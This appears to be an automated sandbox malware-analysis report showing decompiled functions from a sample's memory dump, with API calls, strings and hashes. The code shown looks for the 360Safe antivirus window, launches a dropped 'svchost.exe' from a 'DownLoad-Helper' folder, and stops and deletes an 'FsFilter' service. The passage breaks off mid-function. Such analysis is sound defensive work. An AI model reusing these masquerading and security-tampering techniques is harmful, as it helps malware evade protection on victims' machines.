										_t66 = _t67 + 0x18;
										E00CA6BF1();
									}
								}
								goto L17;
							}
						}
						goto L17;
					}
				}
			}

0x00ca846a
0x00ca8470
0x00ca8477
0x00000000
0x00ca8483
0x00ca8495
0x00ca862d
0x00ca862f
0x00000000
0x00ca84ae
0x00ca84ae
0x00ca84bc
0x00ca84c0
0x00ca84da
0x00ca84e0
0x00ca84e4
0x00ca84e9
0x00ca84eb
0x00ca84f8
0x00ca84fc
0x00000000
0x00000000
0x00ca8504
0x00ca8512
0x00ca851a
0x00ca851e
0x00ca8522
0x00ca8526
0x00ca852a
0x00ca852e
0x00ca8536
0x00ca853c
0x00ca853e
0x00ca8546
0x00ca854a
0x00ca8551
0x00ca8556
0x00ca8559
0x00ca8560
0x00ca8562
0x00ca8565
0x00ca856c
0x00ca8571
0x00ca8576
0x00ca857e
0x00ca8583
0x00ca8583
0x00ca854a
0x00ca8589
0x00ca8591
0x00ca8593
0x00ca859b
0x00ca859f
0x00ca85a6
0x00ca85ab
0x00ca85ae
0x00ca85b5
0x00ca85b7
0x00ca85ba
0x00ca85c1
0x00ca85c6
0x00ca85cb
0x00ca85d3
0x00ca85d8
0x00ca85d8
0x00ca859f
0x00ca85de
0x00ca85e6
0x00ca85e8
0x00ca85f0
0x00ca85f4
0x00ca85fb
0x00ca8600
0x00ca8603
0x00ca860a
0x00ca860c
0x00ca860f
0x00ca8616
0x00ca861b
0x00ca8620
0x00ca8628
0x00ca8628
0x00ca85f4
0x00000000
0x00ca85e6
0x00ca84eb
0x00000000
0x00ca84c0
0x00ca8495

APIs

FindWindowA.USER32 ref: 00CA848D
GetCursorPos.USER32(?), ref: 00CA84A0
WindowFromPoint.USER32(?,?), ref: 00CA84B6
GetClassNameA.USER32(00000000,?,00000104), ref: 00CA84DA
GetWindowRect.USER32 ref: 00CA8504
Sleep.KERNEL32(00000064), ref: 00CA862F

Strings

360Safe.exe, xrefs: 00CA855B, 00CA85B0, 00CA8605
#32770, xrefs: 00CA84E4
Q360SafeMainClass, xrefs: 00CA8488

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$ClassCursorFindFromNamePointRectSleep
String ID: #32770$360Safe.exe$Q360SafeMainClass
API String ID: 1993317795-348236656
Opcode ID: 1ec6e964b7c51bfd8f34cb80eea034a6d0df0f69144c7d0682ecc30cde94df89
Instruction ID: 36989345c420423210887bdab44eb2397d09b6dacf80d6828388aae1808418b3
Opcode Fuzzy Hash: 1ec6e964b7c51bfd8f34cb80eea034a6d0df0f69144c7d0682ecc30cde94df89
Instruction Fuzzy Hash: BB4106319057069FD742FF39D80246A7BE8FF47788F50425AF885B71A2EF20C50A87A2

Uniqueness

Uniqueness Score: -1.00%

Function 00D52263 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00D52263(intOrPtr __ebx, intOrPtr* __edi, void* __esi, void* __eflags, intOrPtr _a8, intOrPtr _a12, char* _a16) {
				intOrPtr _v4;
				intOrPtr* _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _t45;
				void* _t52;
				char* _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				intOrPtr* _t86;
				intOrPtr* _t91;

				_t86 = __edi;
				_t62 = __ebx;
				_push(8);
				E00DDD52C(0xe1013a, __ebx, __edi, __esi);
				_t90 = 0;
				_v4 = 0;
				_v20 = 0;
				if(_a12 == 0) {
					L12:
					E00CAA4E7(_t62, _t66, _t86, _t90, __eflags);
					asm("int3");
					_push(_t66);
					_push(_t90);
					_t91 = _t66;
					_push(_t86);
					__eflags = 0;
					_v12 = _t91;
					 *_t91 = 0xe2a168;
					 *((intOrPtr*)(_t91 + 4)) = 0;
					 *((intOrPtr*)(_t91 + 8)) = 0;
					 *((intOrPtr*)(_t91 + 0xc)) = 0;
					E00CA67E1(_t91 + 0x10);
					 *((intOrPtr*)(_t91 + 0x14)) = 0;
					 *((intOrPtr*)(_t91 + 0x18)) = 0;
					 *((intOrPtr*)(_t91 + 0x1c)) = 0;
					return _t91;
				} else {
					_t86 = _a8;
					_t66 = _t86;
					E00CA67E1(_t66);
					_t63 = _a16;
					_v4 = 0;
					_v20 = 1;
					if(_t63 == 0 ||  *_t63 == 0) {
						_t62 =  *((intOrPtr*)(E00CACEEE(_t63, _t86, _t90, __eflags) + 4));
						__eflags =  *((intOrPtr*)( *((intOrPtr*)(E00CACEEE(_t62, _t86, _t90, __eflags) + 4)) + 0x58)) - _t90;
						if(__eflags == 0) {
							goto L12;
						} else {
							__eflags =  *((intOrPtr*)( *((intOrPtr*)(E00CACEEE(_t62, _t86, _t90, __eflags) + 4)) + 0x6c)) - _t90;
							if(__eflags == 0) {
								goto L12;
							} else {
								_push(E00DEC1A0("SOFTWARE\\"));
								E00CA2CD7(_t62, _t86, _t86, _t90, "SOFTWARE\\");
								_push( *((intOrPtr*)(_t62 + 0x58)));
								E00CA2ABC(_t62,  &_v16, _t86, _t90, __eflags);
								_t45 = _v16;
								_v4 = 1;
								__eflags =  *((intOrPtr*)(_t45 - 0xc));
								if( *((intOrPtr*)(_t45 - 0xc)) != 0) {
									_push( *((intOrPtr*)(_t45 - 0xc)));
									E00CA93E8(_t62, _t86, _t86, _t45);
									_push(E00DEC1A0(0xe19188));
									E00CA93E8(_t62, _t86, _t86, 0xe19188);
								}
								_t64 =  *((intOrPtr*)(_t62 + 0x6c));
								__eflags = _t64;
								if(_t64 != 0) {
									_t90 = E00DEC1A0(_t64);
								}
								_push(_t90);
								E00CA93E8(_t64, _t86, _t86, _t64);
								_push(E00DEC1A0(0xe19188));
								E00CA93E8(0xe19188, _t86, _t86, 0xe19188);
								_push(E00DEC1A0(_a12));
								E00CA93E8(0xe19188, _t86, _t86, _a12);
								_push(E00DEC1A0(0xe19188));
								_t52 = E00CA93E8(0xe19188, _t86, _t86, 0xe19188);
								__eflags = _v16 + 0xfffffff0;
								E00CA2975(_t52, _v16 + 0xfffffff0);
								goto L11;
							}
						}
					} else {
						_push(E00DEC1A0(_t63));
						E00CA2CD7(_t63, _t86, _t86, 0, _t63);
						L11:
						return E00DDD4FA(_t86);
					}
				}
			}

0x00d52263
0x00d52263
0x00d52263
0x00d5226a
0x00d5226f
0x00d52271
0x00d52274
0x00d5227a
0x00d5239a
0x00d5239a
0x00d5239f
0x00d523a3
0x00d523a4
0x00d523a5
0x00d523a7
0x00d523a8
0x00d523aa
0x00d523ad
0x00d523b6
0x00d523b9
0x00d523bc
0x00d523bf
0x00d523c4
0x00d523c9
0x00d523cc
0x00d523d2
0x00d52280
0x00d52280
0x00d52283
0x00d52285
0x00d5228a
0x00d5228d
0x00d52290
0x00d52299
0x00d522ba
0x00d522c5
0x00d522c8
0x00000000
0x00d522ce
0x00d522d6
0x00d522d9
0x00000000
0x00d522df
0x00d522ea
0x00d522f2
0x00d522f7
0x00d522fd
0x00d52302
0x00d52305
0x00d5230c
0x00d52310
0x00d52312
0x00d52318
0x00d52328
0x00d52330
0x00d52330
0x00d52335
0x00d52338
0x00d5233a
0x00d52343
0x00d52343
0x00d52345
0x00d52349
0x00d5235a
0x00d5235e
0x00d5236c
0x00d52372
0x00d5237e
0x00d52382
0x00d5238a
0x00d5238d
0x00000000
0x00d5238d
0x00d522d9
0x00d522a0
0x00d522a7
0x00d522ab
0x00d52392
0x00d52399
0x00d52399
0x00d52299

APIs

__EH_prolog3.LIBCMT ref: 00D5226A
_strlen.LIBCMT ref: 00D522A1
_strlen.LIBCMT ref: 00D522E4
_strlen.LIBCMT ref: 00D52322
_strlen.LIBCMT ref: 00D5233D
_strlen.LIBCMT ref: 00D52354
_strlen.LIBCMT ref: 00D52366
_strlen.LIBCMT ref: 00D52378

Strings

SOFTWARE\, xrefs: 00D522DF, 00D522EB

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: _strlen$H_prolog3
String ID: SOFTWARE\
API String ID: 2883720156-3302998844
Opcode ID: 74ab3444b0f5be1f9fc167c7fe67f8d0e9064f736b5f83d12b9403b45be40ebf
Instruction ID: 2e5521591110d177faa0c463a8a5179c5aa1e9e72cc872b97d6e93b711c77ad4
Opcode Fuzzy Hash: 74ab3444b0f5be1f9fc167c7fe67f8d0e9064f736b5f83d12b9403b45be40ebf
Instruction Fuzzy Hash: 4D319070601312AFEF15BB64C8869BD736AEF96315F48404DFC116B293CAB84C85E731

Uniqueness

Uniqueness Score: -1.00%

Function 00CA298D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 90
processfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00CA298D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t26;
				signed int _t52;
				void* _t54;
				void* _t64;
				struct _STARTUPINFOA _t76;
				void* _t77;
				void* _t78;
				void* _t82;

				_t82 = __eflags;
				_t64 = __edx;
				_push(0xa0);
				E00DDD55F(0xe07974, __ebx, __edi, __esi);
				_t52 = 7;
				memcpy(_t77 - 0x30, "C:\\DownLoad-Helper\\svchost.exe", _t52 << 2);
				_t54 = 7;
				asm("movsw");
				asm("movsb");
				_t26 = memcpy(_t77 - 0x50, "C:\\DownLoad-Helper\\svchost.dat", 0 << 2);
				asm("movsw");
				asm("movsb");
				_t76 = 0x44;
				E00DDFBE0("C:\\DownLoad-Helper\\svchost.dat" + _t54 + _t54, _t26, 0, _t76);
				 *(_t77 - 0xac) = _t76;
				_t72 = _t77 - 0x60;
				_t81 = _t78 + 0x24;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E00CA7F36(0, _t77 - 0x60, _t76, _t82);
				E00CA6BF1();
				DeleteFileA(_t77 - 0x30);
				E00CA6BF1();
				_push(0x80b);
				 *((intOrPtr*)(_t77 - 0x64)) = _t78 + 0x24;
				_push(_t77 - 0x30);
				E00CA2ABC(0, _t81, _t77 - 0x60, _t76, _t82);
				 *(_t77 - 4) = 0;
				E00CA2ABC(0, _t81, _t77 - 0x60, _t76, _t82);
				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				E00CA73CD(0, _t64, _t82, _t77 - 0x50, _t81);
				if(CreateProcessA(_t77 - 0x30, 0, 0, 0, 0, 0, 0, 0, _t77 - 0xac, _t77 - 0x60) != 0) {
					WaitForInputIdle( *(_t77 - 0x60), 0x7530);
					E00CA6BF1();
					E00CA6BF1();
					WaitForSingleObject( *(_t77 - 0x60), 0xffffffff);
					_t76 = CloseHandle;
					CloseHandle( *(_t77 - 0x60));
					CloseHandle( *(_t77 - 0x5c));
				}
				return E00DDD50E(0, _t72, _t76);
			}

0x00ca298d
0x00ca298d
0x00ca298d
0x00ca2997
0x00ca299e
0x00ca29a7
0x00ca29ab
0x00ca29ae
0x00ca29b8
0x00ca29c1
0x00ca29c3
0x00ca29c5
0x00ca29c6
0x00ca29ca
0x00ca29d1
0x00ca29d7
0x00ca29da
0x00ca29dd
0x00ca29de
0x00ca29df
0x00ca29e0
0x00ca29e1
0x00ca29eb
0x00ca29f4
0x00ca29ff
0x00ca2a04
0x00ca2a08
0x00ca2a0d
0x00ca2a0e
0x00ca2a17
0x00ca2a1d
0x00ca2a22
0x00ca2a26
0x00ca2a4b
0x00ca2a55
0x00ca2a60
0x00ca2a6a
0x00ca2a74
0x00ca2a7d
0x00ca2a83
0x00ca2a88
0x00ca2a88
0x00ca2a8f

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA2997

Part of subcall function 00CA7F36: __EH_prolog3_GS.LIBCMT ref: 00CA7F40

Part of subcall function 00CA6BF1: DeviceIoControl.KERNEL32 ref: 00CA6C09

DeleteFileA.KERNEL32(?), ref: 00CA29F4

Part of subcall function 00CA2ABC: __EH_prolog3.LIBCMT ref: 00CA2AC3

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 00CA2A43
WaitForInputIdle.USER32 ref: 00CA2A55
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CA2A74
CloseHandle.KERNEL32(?), ref: 00CA2A83
CloseHandle.KERNEL32(?), ref: 00CA2A88

Strings

C:\DownLoad-Helper\svchost.dat, xrefs: 00CA29B9
C:\DownLoad-Helper\svchost.exe, xrefs: 00CA299F

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CloseH_prolog3_HandleWait$ControlCreateDeleteDeviceFileH_prolog3IdleInputObjectProcessSingle
String ID: C:\DownLoad-Helper\svchost.dat$C:\DownLoad-Helper\svchost.exe
API String ID: 3206176557-1576789839
Opcode ID: 90441da59875027573025ad67bbca3fd580dd3af40a1578024166e258cfd8903
Instruction ID: 612efa9273e9cce960908417385717e9249b9bc21490c95f2800c4760791bdc3
Opcode Fuzzy Hash: 90441da59875027573025ad67bbca3fd580dd3af40a1578024166e258cfd8903
Instruction Fuzzy Hash: 51219F31D14229AFDF00ABE5EC46ECEBB7AFF05314F004526F555BB1A1CE705E089AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA907D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53
serviceCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00CA907D() {
				signed int _v8;
				struct _SERVICE_STATUS _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t4;
				char* _t15;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				signed int _t24;

				_t4 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t4 ^ _t24;
				_t15 = 0;
				_t20 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t20 != 0) {
					_push(_t21);
					_t22 = OpenServiceA(_t20, "FsFilter", 0xf01ff);
					if(_t22 != 0) {
						ControlService(_t22, 1,  &_v36);
						if(DeleteService(_t22) != 0) {
							_t15 = 1;
						}
						CloseServiceHandle(_t22);
						CloseServiceHandle(_t20);
						_t6 = _t15;
					} else {
						CloseServiceHandle(_t20);
						_t6 = 0;
					}
					_pop(_t21);
				}
				return E00DDCBCE(_t6, _t15, _v8 ^ _t24, _t19, _t20, _t21);
			}

0x00ca9083
0x00ca908a
0x00ca9094
0x00ca909e
0x00ca90a2
0x00ca90a4
0x00ca90b6
0x00ca90ba
0x00ca90ce
0x00ca90dd
0x00ca90e1
0x00ca90e1
0x00ca90e9
0x00ca90ec
0x00ca90ee
0x00ca90bc
0x00ca90bd
0x00ca90c3
0x00ca90c3
0x00ca90f0
0x00ca90f0
0x00ca90fe

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,00CA7D9E,00000060,00CA7DF1,00CA7EF7,0000001C,00CA654A,?,?,000000FF), ref: 00CA9098
OpenServiceA.ADVAPI32(00000000,FsFilter,000F01FF,C:\DownLoad-Helper\x64_FsFilter.dat,?,?,00CA7D9E,00000060,00CA7DF1,00CA7EF7,0000001C,00CA654A,?,?,000000FF), ref: 00CA90B0
CloseServiceHandle.ADVAPI32(00000000,?,?,00CA7D9E,00000060,00CA7DF1,00CA7EF7,0000001C,00CA654A,?,?,000000FF), ref: 00CA90BD
ControlService.ADVAPI32(00000000,00000001,?,?,?,00CA7D9E,00000060,00CA7DF1,00CA7EF7,0000001C,00CA654A,?,?,000000FF), ref: 00CA90CE
DeleteService.ADVAPI32(00000000,?,?,00CA7D9E,00000060,00CA7DF1,00CA7EF7,0000001C,00CA654A,?,?,000000FF), ref: 00CA90D5
CloseServiceHandle.ADVAPI32(00000000,?,?,00CA7D9E,00000060,00CA7DF1,00CA7EF7,0000001C,00CA654A,?,?,000000FF), ref: 00CA90E9
CloseServiceHandle.ADVAPI32(00000000,?,?,00CA7D9E,00000060,00CA7DF1,00CA7EF7,0000001C,00CA654A,?,?,000000FF), ref: 00CA90EC

Strings

C:\DownLoad-Helper\x64_FsFilter.dat, xrefs: 00CA90A4
FsFilter, xrefs: 00CA90AA

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Service$CloseHandle$Open$ControlDeleteManager
String ID: C:\DownLoad-Helper\x64_FsFilter.dat$FsFilter
API String ID: 1859593115-2958689618
Opcode ID: e2b8c161aa14119b1ae0f912d974eeb9636306b350d473a9bb5bdf635d72e687
Instruction ID: 3bcbe188e57bab871e0a53bd9b1eada01a692a996f82d2ee333ab468d63f4308
Opcode Fuzzy Hash: e2b8c161aa14119b1ae0f912d974eeb9636306b350d473a9bb5bdf635d72e687
Instruction Fuzzy Hash: F901F231604319AF97119F76ADC6DBF3ABCEB4EB947000029F552F2240CE70CE0997A0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB14F5 Relevance: 15.5, APIs: 10, Instructions: 487COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4aea8072ce3dfe46aa1c62be1d284fe5c222d792e769295cda95d6e243f8ed
Instruction ID: 1a5ad38d004b2d748155ced53a96ab441b9f63322c5ab36475399ce70d8d9dc2
Opcode Fuzzy Hash: 2a4aea8072ce3dfe46aa1c62be1d284fe5c222d792e769295cda95d6e243f8ed
Instruction Fuzzy Hash: 9E02BB35A00615DFCB11CF9AD8A49EEB7B6FF89310F698159ED12AB350C731AE44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CCB6A1 Relevance: 15.3, APIs: 10, Instructions: 348
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00CCB6A1(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed char _t132;
				long _t142;
				signed int _t143;
				char _t150;
				int _t155;
				void* _t171;
				void* _t172;
				intOrPtr* _t176;
				void* _t178;
				void* _t184;
				void* _t191;
				intOrPtr _t204;
				char _t219;
				intOrPtr _t224;
				signed int _t225;
				int _t235;
				void* _t263;
				void* _t268;
				void* _t270;
				long _t271;
				void* _t272;
				int _t274;
				void* _t275;
				void* _t276;
				long _t277;
				void* _t279;
				void* _t280;

				_push(0x30);
				E00DDD52C(0xe098eb, __ebx, __edi, __esi);
				_t270 = __ecx;
				 *(_t280 - 0x2c) = __ecx;
				_t222 =  *((intOrPtr*)(_t280 + 8));
				 *((char*)(_t280 - 0x1c)) =  *((intOrPtr*)(_t280 + 8));
				_t132 = E00CB778C(__ecx);
				if((_t132 & 0x00000008) == 0) {
					__eflags = _t132 & 0x00000010;
					if((_t132 & 0x00000010) != 0) {
						_t219 = E00DF0387(_t222);
						goto L4;
					}
				} else {
					_t219 = E00DF0434(_t222);
					L4:
					 *((char*)(_t280 - 0x1c)) = _t219;
				}
				SendMessageA( *(_t270 + 0x20), 0xb0, _t280 - 0x18, _t280 - 0x14);
				E00CCAB29(_t270, _t280 - 0x24, _t280 - 0x20,  *(_t280 - 0x18), 1);
				_t228 =  *(_t280 - 0x18);
				_t274 =  *(_t280 - 0x24);
				_t268 =  *(_t280 - 0x14);
				if(_t228 >= 0 || _t268 <=  *((intOrPtr*)( *((intOrPtr*)(_t270 + 0x80)) - 0xc))) {
					if(_t228 < _t274) {
						goto L45;
					} else {
						_t142 =  *(_t280 - 0x20);
						if(_t228 > _t142 || _t268 < _t274 || _t268 > _t142) {
							goto L45;
						} else {
							if(_t228 != _t268) {
								_t143 = E00CCA921(_t270, _t274,  *((intOrPtr*)(_t280 - 0x1c)), _t228);
								__eflags = _t143;
								if(_t143 == 0) {
									goto L26;
								} else {
									_t223 = 0;
									__eflags =  *( *((intOrPtr*)(_t270 + 0x88)) - 0xc);
									if(__eflags == 0) {
										SendMessageA( *(_t270 + 0x20), 0xb0, _t280 - 0x3c, _t280 - 0x38);
										E00CB236A(0, _t270, __eflags);
										_push( *(_t280 - 0x38));
										_push( *(_t280 - 0x3c));
										goto L28;
									} else {
										_t275 =  *(_t280 - 0x18);
										 *(_t280 - 0x24) = 1;
										 *(_t280 - 0x28) = _t275;
										 *((intOrPtr*)(_t280 - 0x34)) = _t270 + 0x84;
										_t150 = E00CAAF63(_t270 + 0x84, _t275);
										_t271 =  *(_t280 - 0x20);
										_t224 =  *((intOrPtr*)(_t280 - 0x34));
										_t276 = _t275 + 1;
										 *((char*)(_t280 - 0xd)) = _t150;
										while(1) {
											__eflags = _t276 - _t271;
											if(_t276 >= _t271) {
												break;
											}
											_t184 = E00CAAF63(_t224, _t276);
											__eflags = _t184 -  *((intOrPtr*)(_t280 - 0xd));
											if(_t184 ==  *((intOrPtr*)(_t280 - 0xd))) {
												_t276 = _t276 + 1;
												 *(_t280 - 0x24) =  *(_t280 - 0x24) + 1;
												continue;
											}
											break;
										}
										_t235 =  *(_t280 - 0x24);
										_t270 =  *(_t280 - 0x2c);
										_t274 =  *(_t280 - 0x28);
										_t225 = 0;
										__eflags =  *(_t280 - 0x14) -  *(_t280 - 0x18) - _t235;
										if( *(_t280 - 0x14) -  *(_t280 - 0x18) <= _t235) {
											 *((intOrPtr*)(_t280 - 0x30)) = _t270 + 0x80;
											E00CA7B78(_t270 + 0x80, _t280 - 0x20, _t274, _t235);
											_t155 =  *(_t280 - 0x24);
											 *((intOrPtr*)(_t280 - 4)) = _t225;
											__eflags = _t155;
											if(_t155 > 0) {
												_t279 =  *(_t280 - 0x14) -  *(_t280 - 0x18);
												__eflags = _t155 - _t279 + 1;
												_t171 = E00CA921F(_t280 - 0x20, _t280 - 0x34, _t155 - _t279 + 1);
												 *((char*)(_t280 - 4)) = 1;
												_t172 = E00CA68A8(_t280 - 0x20, _t171);
												 *((char*)(_t280 - 4)) = _t225;
												E00CA2975(_t172,  *((intOrPtr*)(_t280 - 0x34)) - 0x10);
												_push(_t279 - 1);
												_push( *(_t270 + 0x8c) & 0x000000ff);
												_t176 = E00CCA7D9(_t225, _t280 - 0x34, _t270, _t279, __eflags);
												 *((char*)(_t280 - 4)) = 2;
												_push( *((intOrPtr*)( *_t176 - 0xc)));
												_t178 = E00CA93E8(_t225, _t280 - 0x20, _t270,  *_t176);
												 *((char*)(_t280 - 4)) = _t225;
												E00CA2975(_t178,  *((intOrPtr*)(_t280 - 0x34)) - 0x10);
												E00CBFBBF(_t225, _t280 - 0x20, _t270, _t279, _t225,  *((intOrPtr*)(_t280 - 0x1c)));
												_t274 =  *(_t280 - 0x28);
												_t155 =  *(_t280 - 0x24);
											}
											E00CCC671(_t270, _t274, _t155 + _t274, _t225);
											_t277 =  *(_t280 - 0x20);
											SendMessageA( *(_t270 + 0x20), 0xc2, 1, _t277);
											E00CCC671(_t270,  *(_t280 - 0x28),  *(_t280 - 0x28), _t225);
											 *((intOrPtr*)(_t280 - 0x34)) = _t225;
											__eflags =  *((intOrPtr*)(_t277 - 0xc)) - _t225;
											if( *((intOrPtr*)(_t277 - 0xc)) > _t225) {
												_t272 =  *(_t280 - 0x28);
												do {
													E00CBFBBF(_t225,  *((intOrPtr*)(_t280 - 0x30)), _t272, _t277, _t225 + _t272, E00CAAF63(_t280 - 0x20, _t225) & 0x000000ff);
													_t225 = _t225 + 1;
													__eflags = _t225 -  *((intOrPtr*)(_t277 - 0xc));
												} while (_t225 <  *((intOrPtr*)(_t277 - 0xc)));
												_t270 =  *(_t280 - 0x2c);
												_t225 = 0;
												__eflags = 0;
											}
											_t140 = E00CA2975(E00CCC671(_t270,  *(_t280 - 0x18) + 1,  *(_t280 - 0x18) + 1, _t225), _t277 - 0x10);
										} else {
											MessageBeep(0xffffffff);
											_push(_t225);
											_push( *(_t280 - 0x24) + _t274);
											goto L46;
										}
									}
								}
							} else {
								_t223 = 0;
								if( *((intOrPtr*)( *((intOrPtr*)(_t270 + 0x84)) - 0xc)) == 0) {
									__eflags = E00CCA921(_t270, _t274,  *((intOrPtr*)(_t280 - 0x1c)), _t228);
									if(__eflags != 0) {
										SendMessageA( *(_t270 + 0x20), 0xb0, _t280 - 0x28, _t280 - 0x2c);
										E00CB236A(0, _t270, __eflags);
										_push( *(_t280 - 0x2c));
										_push( *(_t280 - 0x28));
										L28:
										_push(1);
										_t140 = E00CCA9DE(_t223, _t270, _t270, _t274, __eflags);
									} else {
										goto L26;
									}
								} else {
									if(_t268 !=  *(_t280 - 0x20)) {
										L18:
										_t191 = E00CCA921(_t270, _t274,  *((intOrPtr*)(_t280 - 0x1c)), _t228);
										_t295 = _t191;
										if(_t191 == 0) {
											goto L26;
										} else {
											E00CCC671(_t270,  *(_t280 - 0x18),  *(_t280 - 0x14) + 1, _t223);
											_push(1);
											_push( *((intOrPtr*)(_t280 - 0x1c)));
											E00CA2975(SendMessageA( *(_t270 + 0x20), 0xc2, 1,  *(E00CCA7D9(_t223, _t280 - 0x2c, _t270, _t274, _t295))),  *(_t280 - 0x2c) - 0x10);
											E00CBFBBF(_t223, _t270 + 0x80, _t270, _t274,  *(_t280 - 0x14),  *((intOrPtr*)(_t280 - 0x1c)));
											E00CCC671(_t270,  *(_t280 - 0x14) + 1,  *(_t280 - 0x14) + 1, _t223);
											_t140 = SendMessageA( *(_t270 + 0x20), 0xb0, _t280 - 0x18, _t280 - 0x14);
											_t263 =  *(_t280 - 0x14);
											if(_t263 ==  *(_t280 - 0x20)) {
												_t204 =  *((intOrPtr*)(_t270 + 0x80));
												_t140 =  *((intOrPtr*)(_t204 - 0xc)) - 1;
												if(_t263 <  *((intOrPtr*)(_t204 - 0xc)) - 1) {
													_t140 = E00CCAB29(_t270, _t280 - 0x24, _t280 - 0x20, _t263 + 1, 1);
													_t263 =  *(_t280 - 0x14);
													_t274 =  *(_t280 - 0x24);
												}
												if(_t274 != 0xffffffff && _t274 > _t263) {
													_push(_t223);
													_push(_t274);
													goto L46;
												}
											}
										}
									} else {
										if(_t268 >=  *((intOrPtr*)( *((intOrPtr*)(_t270 + 0x80)) - 0xc)) - 1) {
											L26:
											_t140 = MessageBeep(0xffffffff);
										} else {
											E00CCAB29(_t270, _t280 - 0x24, _t280 - 0x20, _t268 + 1, 1);
